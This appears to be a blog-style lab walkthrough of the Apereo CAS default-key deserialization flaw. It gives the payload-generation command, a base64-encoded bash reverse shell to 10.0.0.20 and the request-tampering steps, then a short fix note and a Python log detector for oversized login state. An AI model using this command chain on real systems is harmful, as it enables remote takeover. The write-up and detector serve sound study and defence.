You may play with open-source stuff, but don't resell it for money, or you violate the open-source license.
They will send you a lawyer's letter.
After watching the monitoring console for two days, my eyes were bloodshot.
There were twenty-odd alerts, more than ten of them for the Apereo CAS hard-coded key vulnerability. I was puzzled: how could there be attacks inside the intranet? They all targeted the same IP. Then they gave me a dozen scanner IPs and told me to ignore them......
I checked them one by one; the IPs did not match. I reported it, it turned out not to be normal business traffic, and the IP was blocked.
Vulnerability overview:
Apereo CAS is a centralized authentication service platform published by Apereo, commonly used for internal enterprise single sign-on. Versions before 4.1.7 ship with a default key; with this default key, an attacker can craft malicious data that triggers a deserialization vulnerability on the target and ends in arbitrary command execution.
Since this is a Java deserialization vulnerability, I won't go into all the details; straight to a reverse shell.
Environment setup:
Log in to the web page and remember what it looks like, so that if you ever run into it you recognize this vulnerability at first glance.
The root cause is the use of the default key "changeit". Just like Shiro deserialization, the known default key is used to build the serialized attack payload (my own understanding).
    public class EncryptedTranscoder implements Transcoder {
        private CipherBean cipherBean;
        private boolean compression = true;

        public EncryptedTranscoder() throws IOException {
            BufferedBlockCipherBean bufferedBlockCipherBean = new BufferedBlockCipherBean();
            bufferedBlockCipherBean.setBlockCipherSpec(new BufferedBlockCipherSpec("AES", "CBC", "PKCS7"));
            bufferedBlockCipherBean.setKeyStore(this.createAndPrepareKeyStore());
            bufferedBlockCipherBean.setKeyAlias("aes128");
            // Hard-coded key password: every unpatched installation shares it
            bufferedBlockCipherBean.setKeyPassword("changeit");
            bufferedBlockCipherBean.setNonce(new RBGNonce());
            this.setCipherBean(bufferedBlockCipherBean);
        }
        // ... (remainder of the class is not shown on the page)
    }
How is the vulnerability exploited?
Use ysoserial's CommonsCollections4 chain to generate the encrypted payload:
Download: https://github.com/vulhub/Apereo-CAS-Attack/releases

    java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "command to execute"
Reverse shell
First base64-encode the command, simply using Burp's encoder tool:

    bash -i >& /dev/tcp/10.0.0.20/6666 0>&1

    YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMjAvNjY2NiAwPiYx

Put the encoded data into the template below, then encrypt it a second time with the tool:

    bash -c {echo,base64 data}|{base64,-d}|{bash,-i}

    bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMjAvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}
Now generate the encrypted payload with the CommonsCollections4 chain:

    java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMjAvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}"
At the login page, capture the request and modify the data.
Once modified, send it to Repeater.
There is one more step, and it is the key one:
start an nc listener, otherwise where would the reverse shell come from?
After the replacement we get a shell, and it is root, so the privilege escalation step is not needed.
Fix:
Apply the patch and upgrade to the latest version.
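From the defender's side, an added example that is not part of the original post: it flags login POSTs whose webflow state is far larger than a normal one, which is what the alerts described at the top of the post would look like in an access log. It assumes the flow state travels in a form field named execution, shaped like the <uuid>_<base64> value shown above; the log lines and the 1024-byte threshold are constructed for illustration.

```python
import base64
import re
import uuid
from urllib.parse import parse_qs, quote

# Constructed sample data: one ordinary-sized flow state and one oversized one
# (legitimate client-side flow state is a few hundred bytes; the payload shown
# in the post decodes to well over 2 KB).
NORMAL_BLOB = quote(base64.b64encode(b"\x00" * 300).decode(), safe="")
BIG_BLOB = quote(base64.b64encode(b"\x00" * 2500).decode(), safe="")
SAMPLE_LOGS = [
    "10.0.0.5 POST /cas/login username=alice&execution=%s_%s" % (uuid.uuid4(), NORMAL_BLOB),
    "10.0.0.9 POST /cas/login username=bob&execution=%s_%s" % (uuid.uuid4(), BIG_BLOB),
    "10.0.0.7 GET /cas/login -",
]

# '<uuid>_<base64>' shape of the execution value (assumed field layout)
EXEC_RE = re.compile(r"^([0-9a-f-]{36})_(.+)$")


def decoded_state_size(value):
    """Size in bytes of the encrypted flow state carried in an execution value
    (already URL-decoded by parse_qs), or None if it is not in that shape."""
    m = EXEC_RE.match(value)
    if not m:
        return None
    try:
        uuid.UUID(m.group(1))
        return len(base64.b64decode(m.group(2), validate=True))
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def find_oversized(lines, threshold=1024):
    """Return (source_ip, size) for login POSTs whose flow state is >= threshold."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 4 or parts[1] != "POST":
            continue
        for value in parse_qs(parts[3]).get("execution", []):
            size = decoded_state_size(value)
            if size is not None and size >= threshold:
                hits.append((parts[0], size))
    return hits


if __name__ == "__main__":
    for ip, size in find_oversized(SAMPLE_LOGS):
        print(f"{ip}: execution state of {size} bytes, review this login request")
```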